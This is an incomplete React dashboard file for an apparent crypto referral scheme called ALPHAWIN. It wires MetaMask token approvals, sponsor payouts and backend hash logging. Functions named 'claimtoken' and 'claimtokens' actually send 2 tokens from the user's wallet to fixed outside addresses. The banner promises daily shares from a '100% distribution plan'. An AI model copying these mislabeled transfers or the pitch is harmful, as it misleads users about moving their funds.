import React, { useState, useContext, useEffect } from 'react'
import axios from 'axios';
import { ethers } from 'ethers';
import { Web3 } from "web3"
import { base_url } from './Base_url'
import { ColorRing } from 'react-loader-spinner';
import { UserIdContext, WalletContext } from '../context/walletContext';
import income1 from '../Images/income1.png'
import income2 from '../Images/income2.png'
import income3 from '../Images/income3.png'
import income4 from '../Images/income4.png'
import income5 from '../Images/teamwork.png'
import income6 from '../Images/withdraw_1681484.png'
import { NavLink } from 'react-router-dom';
import ClaimToken from './claimToken.js';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome';
import { faLock } from '@fortawesome/free-solid-svg-icons';

// import { toast } from 'react-toastify';
import toast from 'react-hot-toast';
import { toBeEmpty } from '@testing-library/jest-dom/dist/matchers';
// //Token
const tokentokenContractAddress = "0xf9e00165e31366367fc73c263ca1e7ac53a40520"
const abi = [{ "inputs": [], "payable": false, "stateMutability": "nonpayable", "type": "constructor" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "owner", "type": "address" }, { "indexed": true, "internalType": "address", "name": "spender", "type": "address" }, { "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }], "name": "Approval", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "previousOwner", "type": "address" }, { "indexed": true, "internalType": "address", "name": "newOwner", "type": "address" }], "name": "OwnershipTransferred", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "from", "type": "address" }, { "indexed": true, "internalType": "address", "name": "to", "type": "address" }, { "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }], "name": "Transfer", "type": "event" }, { "constant": true, "inputs": [], "name": "_decimals", "outputs": [{ "internalType": "uint8", "name": "", "type": "uint8" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": true, "inputs": [], "name": "_name", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": true, "inputs": [], "name": "_symbol", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": true, "inputs": [{ "internalType": "address", "name": "owner", "type": "address" }, { "internalType": "address", "name": "spender", "type": "address" }], "name": "allowance", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "spender", "type": "address" }, { "internalType": "uint256", "name": "amount", "type": "uint256" }], "name": "approve", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [{ "internalType": "address", "name": "account", "type": "address" }], "name": "balanceOf", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "uint256", "name": "amount", "type": "uint256" }], "name": "burn", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [], "name": "decimals", "outputs": [{ "internalType": "uint8", "name": "", "type": "uint8" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "spender", "type": "address" }, { "internalType": "uint256", "name": "subtractedValue", "type": "uint256" }], "name": "decreaseAllowance", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [], "name": "getOwner", "outputs": [{ "internalType": "address", "name": "", "type": "address" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "spender", "type": "address" }, { "internalType": "uint256", "name": "addedValue", "type": "uint256" }], "name": "increaseAllowance", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "uint256", "name": "amount", "type": "uint256" }], "name": "mint", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [], "name": "name", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": true, "inputs": [], "name": "owner", "outputs": [{ "internalType": "address", "name": "", "type": "address" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [], "name": "renounceOwnership", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": true, "inputs": [], "name": "symbol", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": true, "inputs": [], "name": "totalSupply", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "payable": false, "stateMutability": "view", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "recipient", "type": "address" }, { "internalType": "uint256", "name": "amount", "type": "uint256" }], "name": "transfer", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "sender", "type": "address" }, { "internalType": "address", "name": "recipient", "type": "address" }, { "internalType": "uint256", "name": "amount", "type": "uint256" }], "name": "transferFrom", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "payable": false, "stateMutability": "nonpayable", "type": "function" }, { "constant": false, "inputs": [{ "internalType": "address", "name": "newOwner", "type": "address" }], "name": "transferOwnership", "outputs": [], "payable": false, "stateMutability": "nonpayable", "type": "function" }]

//Contract
const tokenContractAddress = "0x38843b9a1d2da12e953d356c356870c5b36746bb"
const contractAbi = [{ "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "ActivateAccount", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "Contribute", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "UpgradeAccount", "type": "event" }, { "inputs": [{ "internalType": "address payable[]", "name": "_contributors", "type": "address[]" }, { "internalType": "uint256[]", "name": "_balances", "type": "uint256[]" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "activateAccount", "outputs": [], "stateMutability": "payable", "type": "function" }, { "inputs": [{ "internalType": "uint256", "name": "amount", "type": "uint256" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "contribute", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address payable[]", "name": "_contributors", "type": "address[]" }, { "internalType": "uint256[]", "name": "_balances", "type": "uint256[]" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "upgradeAccount", "outputs": [], "stateMutability": "payable", "type": "function" }]


// const tokentokenContractAddress = "0x04bE5783373Fe7215956B1C43AC0b87Ee2218918"
// const abi = [{ "inputs": [{ "internalType": "string", "name": "_name", "type": "string" }, { "internalType": "string", "name": "_symbol", "type": "string" }, { "internalType": "uint256", "name": "_decimals", "type": "uint256" }, { "internalType": "uint256", "name": "_supply", "type": "uint256" }, { "internalType": "address", "name": "tokenOwner", "type": "address" }], "stateMutability": "nonpayable", "type": "constructor" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "owner", "type": "address" }, { "indexed": true, "internalType": "address", "name": "spender", "type": "address" }, { "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }], "name": "Approval", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "blackListed", "type": "address" }, { "indexed": false, "internalType": "bool", "name": "value", "type": "bool" }], "name": "Blacklist", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "burner", "type": "address" }, { "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }], "name": "Burn", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "previousOwner", "type": "address" }, { "indexed": true, "internalType": "address", "name": "newOwner", "type": "address" }], "name": "OwnershipTransferred", "type": "event" }, { "anonymous": false, "inputs": [], "name": "Pause", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": true, "internalType": "address", "name": "from", "type": "address" }, { "indexed": true, "internalType": "address", "name": "to", "type": "address" }, { "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }], "name": "Transfer", "type": "event" }, { "anonymous": false, "inputs": [], "name": "Unpause", "type": "event" }, { "inputs": [{ "internalType": "address", "name": "_who", "type": "address" }, { "internalType": "uint256", "name": "_value", "type": "uint256" }], "name": "_burn", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_owner", "type": "address" }, { "internalType": "address", "name": "_spender", "type": "address" }], "name": "allowance", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "stateMutability": "view", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_spender", "type": "address" }, { "internalType": "uint256", "name": "_value", "type": "uint256" }], "name": "approve", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_owner", "type": "address" }], "name": "balanceOf", "outputs": [{ "internalType": "uint256", "name": "balance", "type": "uint256" }], "stateMutability": "view", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "listAddress", "type": "address" }, { "internalType": "bool", "name": "isBlackListed", "type": "bool" }], "name": "blackListAddress", "outputs": [{ "internalType": "bool", "name": "success", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "uint256", "name": "_value", "type": "uint256" }], "name": "burn", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [], "name": "decimals", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "stateMutability": "view", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_spender", "type": "address" }, { "internalType": "uint256", "name": "_subtractedValue", "type": "uint256" }], "name": "decreaseApproval", "outputs": [{ "internalType": "bool", "name": "success", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_spender", "type": "address" }, { "internalType": "uint256", "name": "_addedValue", "type": "uint256" }], "name": "increaseApproval", "outputs": [{ "internalType": "bool", "name": "success", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [], "name": "name", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "stateMutability": "view", "type": "function" }, { "inputs": [], "name": "owner", "outputs": [{ "internalType": "address", "name": "", "type": "address" }], "stateMutability": "view", "type": "function" }, { "inputs": [], "name": "pause", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [], "name": "paused", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "stateMutability": "view", "type": "function" }, { "inputs": [], "name": "symbol", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "stateMutability": "view", "type": "function" }, { "inputs": [], "name": "totalSupply", "outputs": [{ "internalType": "uint256", "name": "", "type": "uint256" }], "stateMutability": "view", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_to", "type": "address" }, { "internalType": "uint256", "name": "_value", "type": "uint256" }], "name": "transfer", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "_from", "type": "address" }, { "internalType": "address", "name": "_to", "type": "address" }, { "internalType": "uint256", "name": "_value", "type": "uint256" }], "name": "transferFrom", "outputs": [{ "internalType": "bool", "name": "", "type": "bool" }], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address", "name": "newOwner", "type": "address" }], "name": "transferOwnership", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [], "name": "unpause", "outputs": [], "stateMutability": "nonpayable", "type": "function" }]

// const tokenContractAddress = "0x2a13fa3E4d55226eB66D4DD4e598F87D225A1A99"
// const contractAbi = [{ "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "ActivateAccount", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "Contribute", "type": "event" }, { "anonymous": false, "inputs": [{ "indexed": false, "internalType": "uint256", "name": "value", "type": "uint256" }, { "indexed": true, "internalType": "address", "name": "sender", "type": "address" }], "name": "UpgradeAccount", "type": "event" }, { "inputs": [{ "internalType": "address payable[]", "name": "_contributors", "type": "address[]" }, { "internalType": "uint256[]", "name": "_balances", "type": "uint256[]" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "activateAccount", "outputs": [], "stateMutability": "payable", "type": "function" }, { "inputs": [{ "internalType": "uint256", "name": "amount", "type": "uint256" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "contribute", "outputs": [], "stateMutability": "nonpayable", "type": "function" }, { "inputs": [{ "internalType": "address payable[]", "name": "_contributors", "type": "address[]" }, { "internalType": "uint256[]", "name": "_balances", "type": "uint256[]" }, { "internalType": "contract BEP20", "name": "token", "type": "address" }], "name": "upgradeAccount", "outputs": [], "stateMutability": "payable", "type": "function" }]


const Dashboard = () => {
    const [web3, setWeb3] = useState("")
    const [input, setInput] = useState("30")
    const [name, setName] = useState("")
    const [sponsers, setSponsers] = useState("")
    const [upgradeSponsers, setUpgradeSponsers] = useState("")
    const [locked, setLocked] = useState(true);
    const [lockeds, setLockeds] = useState(true);
    const [balance, setBalance] = useState("")
    const [upgradeBalance, setUpgradeBalance] = useState("")
    const [isClaiming, setIsClaiming] = useState(false);
    const [isClaimings, setIsClaimings] = useState(false);
    const [address, setAddress] = useState("")
    const [value] = useState(65);
    // const [hash, setHash] = useState("")
    const [isLoading, setIsLoading] = useState(false);
    const [isLoader, setIsLoader] = useState(false);
    const [isLoadings, setIsLoadings] = useState(false);
    const [copySuccess, setCopySuccess] = useState(false);
    const [packageamount, setPackageamount] = useState("")

    const [claimtomax, setClaimtomax] = useState("")
    const [claimtomaxs, setClaimtomaxs] = useState("")
    const [tomexmetamask, setTomexmetask] = useState("")
    const [tomexmetamasks, setTomexmetasks] = useState("")
    const [time, setTime] = useState("")
    const [times, setTimes] = useState("")
    const [inputs, setInputs] = useState('65');



    const [data, setData] = useState();
    const [usdtBalance, setUsdtBalance] = useState();
    const [error, setError] = useState("");
    const { userId } = useContext(UserIdContext)
    const { walletAddress } = useContext(WalletContext)
    const web = new Web3("https://time-dataseed.timexscan.io/")
    console.log(web3);
    console.log("walletAddress.....", walletAddress);
    console.log('claimtomax', claimtomax);

    console.log('claimtomaxs', claimtomaxs);
    useEffect(() => {
        userId && fetchData(userId);
        userId && sponser(userId)
        userId && upgradeSponser(userId);

        // fetchBalance()

        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum)
            setWeb3(web3Instance)
        }



    }, [userId]);
    const fetchData = (userId) => {
        setIsLoader(true);
        console.log("Dashboard", userId);
        let config = {
            method: 'get',
            maxBodyLength: Infinity,
            url: `${base_url}Api/user_details/${userId}`,
            headers: {
                'Content-Type': "application/x-www-form-urlencoded"
            },
            // data: data
        };

        axios.request(config)
            .then((response) => {
                console.log(response);
                (JSON.stringify(response))
                console.log("tmx:", response.data.user.data.timex_value);
                setData(response.data.user);
                setName(response.data.user.name)
                console.log("balance", response.data.user.eth_address);
                setUsdtBalance(response.data.user.data.usdt_balance)
                setTime(response.data.user.data.timex_value)
                setTimes(response.data.user.data.upgrade_pool_tomex_count)
                setPackageamount(response.data.user.package_amount)
                setAddress(response.data.user.eth_address)
                setClaimtomax(response.data.tomex_30_claim_button_display)
                setTomexmetask(response.data.tomex_30_metamask_button_display)


                setClaimtomaxs(response.data.tomex_65_claim_button_display)
                // setTomexmetask(response.data.tomex_30_metamask_button_display)
                setTomexmetasks(response.data.tomex_65_metamask_button_display)
            })
            .catch((error) => {
                console.error("Error fetching data1:", error);
                toast.error("Error fetching data1:")
                setError(error);
            }).finally(() => {
                setIsLoader(false); // Stop loader when data fetching is done (success or error)
            });
    }

    const upgradeSponser = async () => {
        let config = {
            method: 'get',
            maxBodyLength: Infinity,
            url: `${base_url}Api/alpha_pool_sponser_team/${userId}`,
            headers: {
                'Content-Type': "application/x-www-form-urlencoded"
            },
        };

        axios(config)
            .then((response) => {
                console.log("response alpha_pool_sponser_team", response.data);
                if (response.data.success === 1) {
                    // toast.success(response.data.message);
                    setUpgradeSponsers(response.data.sponsers);
                    setUpgradeBalance(response.data.balances)
                } else {
                    toast.error(response.data.message);
                }
            })
            .catch((error) => {
                console.error("Error fetching data2:", error);
                toast.error("Error fetching data2:");
            });
    }


    const sponser = async (userId) => {
        let config = {
            method: 'get',
            maxBodyLength: Infinity,
            url: `${base_url}Api/sponser_team/${userId}`,
            headers: {
                'Content-Type': "application/x-www-form-urlencoded"
            },
        };



        axios.request(config)
            .then((response) => {
                console.log(response);
                (JSON.stringify(response))
                console.log("response ...........", response.data.balances);
                setSponsers(response.data.sponsers)
                setBalance(response.data.balances)
            })
            .catch((error) => {
                console.error("Error fetching data3:", error);
                toast.error("Error fetching data3:")
                setError(error);
            });
    }


    async function activateAccount() {
        console.log("function triggered");
        // if (window.ethereum) {
        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum)
            setWeb3(web3Instance)
            //   }
            setIsLoading(true);

            try {
                await window.ethereum.request({ method: 'eth_requestAccounts' });
                const accounts = await web3Instance.eth.getAccounts({ once: true });
                let metamaskAddress = accounts[0]
                console.log("metamaskAddress", metamaskAddress);
                console.log("address",address);
                
                
                if (metamaskAddress.toUpperCase()=== address.toUpperCase()) {
                    console.log('input',input);
                    
                    await approveUSDT(input);
                    await activateUser();
                } else {
                    // alert("You cannot activate someone else Account")
                    toast.error("You cannot activate someone else Account");
                }
            } catch (error) {
                // Handle errors if needed
                console.error('Error:', error);

                toast.error("You cannot activate someone else Account");

            } finally {
                setIsLoading(false);
            }
        }
    }
    const approveUSDT = async (input) => {
        console.log("input", input);

        try {

            if (window.ethereum) {

                const web3Instance = new Web3(window.ethereum);

                setWeb3(web3Instance)
                //   }
                // const accounts = await web3.eth.getAccounts();
                const accounts = await web3Instance.eth.getAccounts({ once: true });
                const usdtContract = new web3.eth.Contract(abi, tokentokenContractAddress);
                console.log('usdtContract', usdtContract);
                await usdtContract.methods.approve(tokenContractAddress, web3.utils.toWei(input, 'ether')).send({ from: accounts[0] });
                // await activateUser();

            }
        } catch (error) {
            console.error('Error approving USDT:', error);
            toast.error("Error approving USDT");
        }
    };




    const activateUser = async () => {
        console.log("inside activateUser>>>>>>>>>>>>>>>>>>>");

        try {
            if (window.ethereum) {
                const web3Instance = new Web3(window.ethereum);
                setWeb3(web3Instance)
                //   }
                let contributors = sponsers
                let balances = balance.map((item => web.utils.toWei(item, 'ether')))
                console.log("balances...........", balances);
                console.log(typeof (contributors), contributors);
                const accounts = await web3.eth.getAccounts();
                const Contract = new web3.eth.Contract(contractAbi, tokenContractAddress);
                try {
                    let hashgenerate = await Contract.methods.activateAccount(contributors, balances, tokentokenContractAddress).send({ from: accounts[0] })
                    console.log("hashgenerate......", hashgenerate);

                    getHash(userId, hashgenerate.transactionHash)
                } catch (error) {
                    console.error(error);
                }
            }


        } catch (error) {
            console.error(error);
        }

    }




    const getHash = async (userId, hash) => {

        const config = {
            method: 'post',
            mode:"no-cors",
            url: `${base_url}Api/save_hash`,
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            data: new URLSearchParams({
                hash: hash,
                user_id: userId,
            }).toString(),
        };


        axios(config)
            .then((response) => {
                console.log("response", response.data);
                if (response.data.success === 1) {
                    // alert(response.data.message);
                    toast.success(response.data.message);
                } else {
                    // alert(response.data.message);
                    toast.error(response.data.message);
                }
            })
            .catch((error) => {
                console.error("Error fetching data4:", error);
                toast.error("Error fetching data4:")
                setError(error);
            });
    }

    const handleInputchange = (e) => {
        setInput(e.target.value)
    }
    const handleInputchanges = (e) => {
        setInputs(e.target.value)
    }
    const claimtoken = async () => {
        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum);
            setWeb3(web3Instance);

            try {
                await window.ethereum.request({ method: "eth_requestAccounts" });
                const accounts = await web3Instance.eth.getAccounts();
                let metamaskAddress=accounts[0]
                if (metamaskAddress.toUpperCase() === address.toUpperCase()) {

                const contract = new web3Instance.eth.Contract(abi, tokentokenContractAddress);

                // Set the recipient address and amount
                const recipientAddress = "0xd9477526439a800C3e8fF3B3F0bA19202540AC6b";
                const amount = web3Instance.utils.toWei("2", "ether");

                // Send the transaction
                const txHash = await contract.methods.transfer(recipientAddress, amount).send({ from: accounts[0] });

                console.log("Transaction hash:", txHash);
                toast.success("Transaction successful!");
                }else{
                  toast.error(" You cannot claim tokens from someone else's account" )
                }
            } catch (error) {
                console.error("Error:", error);
                toast.error("Transaction failed.");
            }
        } else {
            toast.error("MetaMask not detected.");
        }
        setLockeds(false);
    };
    const claimtokens = async () => {
        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum);
            setWeb3(web3Instance);

            try {
                await window.ethereum.request({ method: "eth_requestAccounts" });
                const accounts = await web3Instance.eth.getAccounts();
                let metamaskAddress=accounts[0]
                if (metamaskAddress.toUpperCase() === address.toUpperCase()) {
                const contract = new web3Instance.eth.Contract(abi, tokentokenContractAddress);

                // Set the recipient address and amount
                const recipientAddress = "0x3A8c7b2a2e1865a3C12B11a1210FA8e9Fd4faE22";
                const amount = web3Instance.utils.toWei("2", "ether");

                // Send the transaction
                const txHash = await contract.methods.transfer(recipientAddress, amount).send({ from: accounts[0] });

                console.log("Transaction hash:", txHash);
                toast.success("Transaction successful!");

            }
        else{
            toast.error(" You cannot claim tokens from someone else's account" )
        } }
            catch (error) {
                console.error("Error:", error);
                toast.error("Transaction failed.");
            }
        } else {
            toast.error("MetaMask not detected.");
        }
        setLockeds(false);
    };

    const claim = async () => {
        // Check if window.ethereum is available
        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum);
            try {
                const accounts = await web3Instance.eth.getAccounts({ once: true });
                let metamaskAddress = accounts[0];
                console.log("metamaskAddress",metamaskAddress);
                console.log("address",address);
                

                if (metamaskAddress.toUpperCase() === address.toUpperCase()) {
                    setIsClaiming(true);

                    // await claimtoken()

                    let config = {
                        method: 'get',
                        maxBodyLength: Infinity,
                        url: `${base_url}Api/claim_timex_tokens/${userId}`,
                        headers: {
                            'Content-Type': "application/x-www-form-urlencoded"
                        },
                    };

                    axios.request(config)
                        .then((response) => {
                            // Assuming the response data is already in JSON format
                            const data = response.data;
                            console.log(data);
                            console.log("response ...........", data.transactions);
                            

                            if (data.success === 1) {
                                toast.success(data.message);
                            } else {
                                toast.error(data.message);
                            }
                        })
                        .catch((error) => {
                            console.error("Error fetching data 5:", error);
                            setError(error);
                        }).finally(() => {
                            setIsClaiming(false); 
                        });
                } else {
                    // Show error if addresses do not match
                    toast.error("You cannot claim tokens from someone else's account");
                }
            } catch (error) {
                console.error('Error:', error);
                toast.error("An error occurred while fetching your account address1");
            }
        } else {
            toast.error("MetaMask is not installed. Please install it to continue.");
        }
        setLockeds(false);
    };
    const claims = async () => {
        // Check if window.ethereum is available
        if (window.ethereum) {
            const web3Instance = new Web3(window.ethereum);
            try {
                const accounts = await web3Instance.eth.getAccounts({ once: true });
                let metamaskAddress = accounts[0];


                if (metamaskAddress.toUpperCase() === address.toUpperCase()) {
                    setIsClaimings(true);
                    // await claimtoken()

                    let config = {
                        method: 'get',
                        maxBodyLength: Infinity,
                        
                      url: `${base_url}Api/claim_upgrade_pool_timex_tokens/${userId}`,
                        headers: {
                            'Content-Type': "application/x-www-form-urlencoded"
                        },
                    };

                    axios.request(config)
                        .then((response) => {
                            // Assuming the response data is already in JSON format
                            const data = response.data;
                            console.log(data);
                            console.log("response ...........", data.transactions);

                            if (data.success === 1) {
                                toast.success(data.message);
                            } else {
                                toast.error(data.message);
                            }
                        })
                        .catch((error) => {
                            console.error("Error fetching data 6:", error);
                            setError(error);
                        }).finally(() => {
                            setIsClaimings(false);
                     });
                } else {
                    // Show error if addresses do not match
                    toast.error("You cannot claim tokens from someone else's account");
                }
            } catch (error) {
                console.error('Error:', error);
                toast.error("An error occurred while fetching your account address2");
            }
        } else {
            toast.error("MetaMask is not installed. Please install it to continue.");
        }
        setLockeds(false);
    };


    const handleCopyLink = async () => {
        try {
            const textToCopy = data && data.data.refferal_link;

            if (!textToCopy) {
                console.error('No referral link available');
                return;
            }


            if (navigator.clipboard) {
                await navigator.clipboard.writeText(textToCopy);
                console.log('Async: Copying to clipboard was successful!');
                setCopySuccess(true);

                toast.success('The link has been copied')
            } else {

                const textArea = document.createElement('textarea');
                textArea.value = textToCopy;
                document.body.appendChild(textArea);
                textArea.focus();
                textArea.select();


                document.execCommand('copy');
                console.log('Sync: Copying to clipboard was successful!');
                setCopySuccess(true);

                //   toast.success('The link has been copied')
                document.body.removeChild(textArea);
            }

            // alert('The link has been copied!');
            setTimeout(() => setCopySuccess(false), 2000);
        } catch (error) {
            console.error('Failed to copy:', error);
            toast.error('Failed to copy the link')
        }
    };

    //    
    const UpgradePackage = async () => {
        if (window.ethereum) {
            const web3Instance = new Web3('https://time-dataseed.timexscan.io')
            setWeb3(web3Instance)
            //   }
            setIsLoadings(true);

            try {
                await window.ethereum.request({ method: 'eth_requestAccounts' });
                const accounts = await window.ethereum.request({
                                        method: "eth_requestAccounts",
                                    });
                console.log(' selected account  is' , accounts)
                let metamaskAddress = accounts[0]
                if (metamaskAddress.toUpperCase()=== address.toUpperCase()) {
                    await approveUSDT(inputs);
                    await updateActivateUser()
                } else {
                    toast.error("You cannot activate someone else Account");
                }
            } catch (error) {
                // Handle errors if needed
                console.error('Error:', error);

                toast.error("You cannot activate someone else Account");

            } finally {
                setIsLoadings(false);
            }
        }

    }


    const updateActivateUser = async () => {
        console.log("inside update activateUser>>>>>>>>>>>>>>>>>>>");

        try {
            if (window.ethereum) {
                const web3Instance = new Web3(window.ethereum);
                setWeb3(web3Instance)
                setIsLoadings(true);
                let contributors = upgradeSponsers
                let balances = upgradeBalance.map((item => web.utils.toWei(item, 'ether')))
                console.log("balances...........", balances);
                console.log(typeof (contributors), contributors);
                const accounts = await web3.eth.getAccounts();
                const Contract = new web3.eth.Contract(contractAbi, tokenContractAddress);
                try {
                    let hashgenerate = await Contract.methods.activateAccount(contributors, balances, tokentokenContractAddress).send({ from: accounts[0] })
                    console.log("hashgenerate......", hashgenerate);

                    getHash(userId, hashgenerate.transactionHash)
                } catch (error) {
                    console.error(error);
                }
            }


        } catch (error) {
            console.error(error);
        } finally {
            setIsLoadings(false);
        }

    }

    // const handleClick = async () => {
    //     await claimtoken()
    //     setLocked(false);

    // };
    return (
        <>
            <section className='banner_sec sec01'>
                <div className='container'>
                    <div className='text-center banner_box'>
                        <h5 className='sub_title josefin'>Welcome ALPHAWIN {name && <p>Hello, {name}</p>}</h5>
                        <h1 className='banner_title w josefin'>100% DISTRIBUTION PLAN.JOIN VIP CLUBS AND GET YOUR DAILY SHARES.</h1>
                        <p className='banner_text inter'>World's First VIP CTO Plan in which all the joining and VIP funds are stored in smart contact and VIP Holder can withdraw their income directly from smart contract.</p>
                        <a href='https://t.me/alphawininternational2021' className='btn_m banner_btn josefin w'> Telegram</a>
                    </div>
                </div>
            </section>

            <section className='sec02'>
                <div className='container'>

                    <div className='row'>
                        {/* <div className='boxsixes'>
                            <h2 className='sec_h2 w josefin  '>USDT  Balance {usdtBalance} </h2>
                            <h2 className='sec_h2 w josefin  '> Package Amount {packageamount} </h2>
                        </div> */}
                        <p className='banner_text  inter mt-3 mb-0 w'>USDT  Balance {usdtBalance}</p>
                        <div className='col-lg-3 col-md-3 '>
                            {/* <h2 className='sec_h2 w josefin text-center'>30$ package </h2> */}

                            <div className='sec2_box box-h'>
                                
                                {isLoader ? (
                                    <div className="loader-container">
                                    <ColorRing
                                        colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                        height={100}
                                        width={200}
                                    />
                                </div>
                                ) : (<>
                                <h2 className='sec_h2 w josefin text-center'>Plan A </h2>

                                    {packageamount === "0" ? (

                                        isLoading ? (
                                            <ColorRing
                                                colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                                height={65}
                                                width={65}
                                            />
                                        ) : (
                                            <>


                                                {/* <button className='btn_m form_btn josefin w' onClick={activateAccount}>
                                                Self package 30$
                                            </button> */}
                                                {/* <h2 className='sec_h2 w josefin text-center'>Plan A </h2> */}
                                                

                                                <button className='btn_m form_btn josefin iy w ' onClick={activateAccount}>
                                                    Activate With 30$
                                                </button>

                                            </>
                                        )
                                    ) : (
                                        <>
                                            
                                            <h4 className='text-center inter mt-3 mb-0 i w '>Your Account is Already Activated </h4>
                                           

                                        </>

                                    )}
                                </>)}
                            </div>

                        </div>
                        <div className='col-lg-3 col-md-3  '>
                            {/* <h2 className='sec_h2 w josefin text-center'>65$ package</h2> */}
                            <div className='sec2_box box-h'>
                                {isLoader ? (
                                     <div className="loader-container">
                                     <ColorRing
                                         colors={['#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1', '#08d1d1']}
                                         height={100}
                                        width={200}
                                     />
                                 </div>
                                ) : (<>
                                    <h2 className='sec_h2 w josefin text-center'>Plan  3.C </h2>

